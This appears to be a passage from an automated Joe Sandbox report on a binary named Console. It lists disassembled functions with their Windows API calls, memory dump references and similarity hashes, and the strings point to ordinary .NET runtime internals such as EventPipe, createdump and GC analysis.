                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$ByteCharMultiWide$FreeHeapmalloc
                                                                                                                                                                                                                          • String ID: ArchInformation$CommandLine$Microsoft-DotNETCore-EventPipe$OSInformation$ProcessInfo
                                                                                                                                                                                                                          • API String ID: 897903226-198322117
                                                                                                                                                                                                                          • Opcode ID: d1f14b7a29a55868a2e6a71712c7541960a811b7ee2dbc9c189ece54c45474bf
                                                                                                                                                                                                                          • Instruction ID: 83fa78ca9d4364067a5e6dd10ed933305dc21ed81785e8ea3d91b4d159fef084
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1f14b7a29a55868a2e6a71712c7541960a811b7ee2dbc9c189ece54c45474bf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A51C1B0E10216ABEB149FA9DC55BAEBBB5FF00300F10442CEA15F7390EB74D9108B94
                                                                                                                                                                                                                          Function 0141AD60 Relevance: 19.8, APIs: 13, Instructions: 323fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0141AE4B
                                                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0141AE9C
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0141AEB1
                                                                                                                                                                                                                          • MapViewOfFileEx.KERNEL32(00000000,00000004,?,?,?,00000000), ref: 0141AF07
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000024), ref: 0141AF20
                                                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,?,?,00000000), ref: 0141AF5C
                                                                                                                                                                                                                            • Part of subcall function 01128840: GetFileSize.KERNEL32(?,00000006,0000002C,?,0141AE3C), ref: 01128848
                                                                                                                                                                                                                            • Part of subcall function 01128840: GetLastError.KERNEL32 ref: 01128855
                                                                                                                                                                                                                            • Part of subcall function 01128840: SetLastError.KERNEL32(00000008), ref: 01128868
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,?,?,00000000,?,000000F1,00000000,00000000,00000000,00000001), ref: 0141B00D
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,?,000000F1,00000000,00000000,00000000,00000001), ref: 0141B030
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,000000F1,00000000,00000000,00000000,00000001), ref: 0141B056
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000,?,000000F1,00000000,00000000,00000000,00000001), ref: 0141B0A4
                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E), ref: 0141B0B0
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(0000002C,7CAB6A82,00000000,0000002C), ref: 0141B11A
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,7CAB6A82,00000000,0000002C), ref: 0141B13D
                                                                                                                                                                                                                            • Part of subcall function 01465DD0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,0000002C,00000000,?,0141B09A,?,?,00000000,?,000000F1,00000000,00000000,00000000,00000001), ref: 01465E5C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$ErrorLast$CloseHandleView$Unmap$CreateMapping$Sizefree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2050550979-0
                                                                                                                                                                                                                          • Opcode ID: 8e1fade171bab02f9681f3bc4950a7b90bded6a38ccce5b6ee010db101174d04
                                                                                                                                                                                                                          • Instruction ID: 0d6c4f961db74e55319ee481fc55f3ea6f8acdf161b3a6ec15f30b4386171dbf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e1fade171bab02f9681f3bc4950a7b90bded6a38ccce5b6ee010db101174d04
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0D16BB4A002059FEB24CFA9C948B9EBFF5FF48314F14825EE915AB3A4D7759940CB90
                                                                                                                                                                                                                          Function 012CD580 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 306stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD62A
                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(00000000,?,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD666
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,03BF100E,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,012CDA55,?), ref: 012CD688
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD69A
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,03BF100E,000000FF,00000000,?,00000000,00000000,?,?,?,?,012CDA55,?,?,7CAB6A82), ref: 012CD6BB
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD6C6
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(7CAB6A82,00000000,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD6E1
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD704
                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD752
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimeRundown,Microsoft-Windows-DotNETRuntimeRundown,?,00000000,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CD7CD
                                                                                                                                                                                                                            • Part of subcall function 012D4F50: QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,012CD78E,?,00000000,?,?,?,?,012CDA55), ref: 012D4F7F
                                                                                                                                                                                                                            • Part of subcall function 0107CB60: SleepEx.KERNEL32(00000001,00000000,?,?,012CD070), ref: 0107CBD2
                                                                                                                                                                                                                            • Part of subcall function 0107CB60: SwitchToThread.KERNEL32(00000000,00000111,00000000,?,?,012CD070), ref: 0107CBD8
                                                                                                                                                                                                                            • Part of subcall function 012CFA90: QueryPerformanceCounter.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,012CFE6A), ref: 012CFACE
                                                                                                                                                                                                                            • Part of subcall function 012D3570: HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 012D3642
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharCounterFreeMultiPerformanceQueryWidefreestrcmp$CommandEventHeapLibraryLineSleepSwitchThreadmalloc
                                                                                                                                                                                                                          • String ID: Microsoft-Windows-DotNETRuntimeRundown
                                                                                                                                                                                                                          • API String ID: 3870175671-930870680
                                                                                                                                                                                                                          • Opcode ID: 7dd38cdbf0fdead73a78d57ff867ebc0aca3417f59a787740c6db1b4a4db51df
                                                                                                                                                                                                                          • Instruction ID: 8784c73ed91b5c889a0eb0b9a7454de581f4f9a58e4cbbbdb07ef1cf113e2be0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dd38cdbf0fdead73a78d57ff867ebc0aca3417f59a787740c6db1b4a4db51df
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45B118746102169FEB28DFA9EC4076A7BA1FF54B01F14423CDB09AB398DB70A854CBD0
                                                                                                                                                                                                                          Function 010A00F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 189memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,7CAB6A82,00000080), ref: 010A0266
                                                                                                                                                                                                                          • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0159E428,?,0159EFD4,00000000), ref: 010A02A4
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 010A02CF
                                                                                                                                                                                                                          • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(Ready to Run not enabled.,00000000), ref: 010A02EE
                                                                                                                                                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 010A02F5
                                                                                                                                                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,7CAB6A82,00000080), ref: 010A0318
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,7CAB6A82,00000080), ref: 010A034A
                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,%s: "%s".,?,?,0164A1AC,7CAB6A82,00000080), ref: 010A03A9
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 010A03D5
                                                                                                                                                                                                                            • Part of subcall function 010A3070: HeapFree.KERNEL32(00000000,?,7CAB6A82,?,?,?,00000000,014CADA6,000000FF), ref: 010A30B8
                                                                                                                                                                                                                            • Part of subcall function 0121AF80: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,0151591C,?,01136CBA), ref: 0121AFD0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$fclose$CurrentProcess_wfopenfflushfputs
                                                                                                                                                                                                                          • String ID: %s: "%s".$Ready to Run not enabled.
                                                                                                                                                                                                                          • API String ID: 2498482485-2996686961
                                                                                                                                                                                                                          • Opcode ID: aee81102a4cd8e156819d4ca43a40bd04c98326582385fd474f5a979fa7a110d
                                                                                                                                                                                                                          • Instruction ID: 76aded454093344ee5c6e7bcedff8e3d18bc05b5f1be02a582915c8fda216f45
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aee81102a4cd8e156819d4ca43a40bd04c98326582385fd474f5a979fa7a110d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0381AA719012689FEB21CF98CD88BDEBBB8FF04314F5042D8E959A72A4DB745A84CF51
                                                                                                                                                                                                                          Function 010D84E0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 010D854F
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 010D85C2
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 010D85D5
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 010D85FA
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 010D8605
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimeRundown,00000000), ref: 010D8655
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Microsoft-Windows-DotNETRuntimeRundown, xrefs: 010D8650
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$Heap$AllocateProcessfreemallocstrcmp
                                                                                                                                                                                                                          • String ID: Microsoft-Windows-DotNETRuntimeRundown
                                                                                                                                                                                                                          • API String ID: 753784251-930870680
                                                                                                                                                                                                                          • Opcode ID: c780a731e7555412a8264588536325889a65994202c29672186ceac479feb5a7
                                                                                                                                                                                                                          • Instruction ID: 02126896b65a046605233712a1384b5336b8f9621411b1f674c7270e73c44827
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c780a731e7555412a8264588536325889a65994202c29672186ceac479feb5a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4151E6716443019FD721CF29DC49B16BBE4AF88720F14866EF959AB3D9E771E400CBA2
                                                                                                                                                                                                                          Function 01010D10 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 319memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0122C950: GetModuleFileNameW.KERNEL32(00FC0000,00000000), ref: 0122C9D6
                                                                                                                                                                                                                            • Part of subcall function 0122C950: GetLastError.KERNEL32 ref: 0122CA07
                                                                                                                                                                                                                            • Part of subcall function 0122C950: SetLastError.KERNEL32(00000000,00000000), ref: 0122CB11
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,?,?), ref: 01010E9D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,0000005C,7CAB6A82,?,?), ref: 01011072
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,createdump.exe,7CAB6A82,?,?), ref: 01011178
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$ErrorLast$FileModuleName
                                                                                                                                                                                                                          • String ID: %s$ --diag$ --name $--full$--normal$--triage$--withheap$createdump.exe
                                                                                                                                                                                                                          • API String ID: 3203759797-1772839692
                                                                                                                                                                                                                          • Opcode ID: b515cf1c75c11445419d29647b08d74e23327719fda92279a5a8e1d1b39be01f
                                                                                                                                                                                                                          • Instruction ID: e2a951af74245e1306b82fe1f87586f0e9f5a37315d5a33527b965a070b4a61e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b515cf1c75c11445419d29647b08d74e23327719fda92279a5a8e1d1b39be01f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C18371E006298BDB65CB29CC417EDB7F1BB49310F0482D9E9C9A7289D7789E91CF84
                                                                                                                                                                                                                          Function 012277A0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 329memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01227A41
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000008,?), ref: 01227C39
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 01227C74
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01227D4B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Free$Heap$ErrorLastLibrary
                                                                                                                                                                                                                          • String ID: DllGetClassObject
                                                                                                                                                                                                                          • API String ID: 4070658762-1075368562
                                                                                                                                                                                                                          • Opcode ID: 8de49accee4c861d38bf3128311a1e405f42bc746c6e3cfa125712f8f7e977e5
                                                                                                                                                                                                                          • Instruction ID: d35259a89c75aa844c08b3f4e30e63345cc791e60ac206ede0fee43d976836a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8de49accee4c861d38bf3128311a1e405f42bc746c6e3cfa125712f8f7e977e5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AED18C75D2523AABDB21DF68DC887ADBBB1AF68310F1441D9D909A7390D7749E80CF80
                                                                                                                                                                                                                          Function 010E0070 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 222memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000001,00000000,?,00000000,00000000,00000000,00000001), ref: 010E03DF
                                                                                                                                                                                                                            • Part of subcall function 0121AF80: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,0151591C,?,01136CBA), ref: 0121AFD0
                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32 ref: 010E00F8
                                                                                                                                                                                                                          • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(03BF100E,?,?), ref: 010E0117
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 010E0283
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$CommandLinewcsncmp
                                                                                                                                                                                                                          • String ID: GCGenAnalysisBytes$GCGenAnalysisGen$GCGenAnalysisTimeMSec$GCGenAnalysisTimeUSec$gcgenaware.{pid}.nettrace
                                                                                                                                                                                                                          • API String ID: 894456492-1061429456
                                                                                                                                                                                                                          • Opcode ID: 19594d42bf69a7a3aae8ea5a258fa6dfcb8bfa8e67825b4b7d019732d1348368
                                                                                                                                                                                                                          • Instruction ID: 2bfe12be0b4814271392b9f9645118023dc10a678abb62eef065a7dde19ec270
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19594d42bf69a7a3aae8ea5a258fa6dfcb8bfa8e67825b4b7d019732d1348368
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 029103B4A10206EFD720DF69DD48B9A7BF5FFA4300F1086D9E9049B298EBB09954CB51
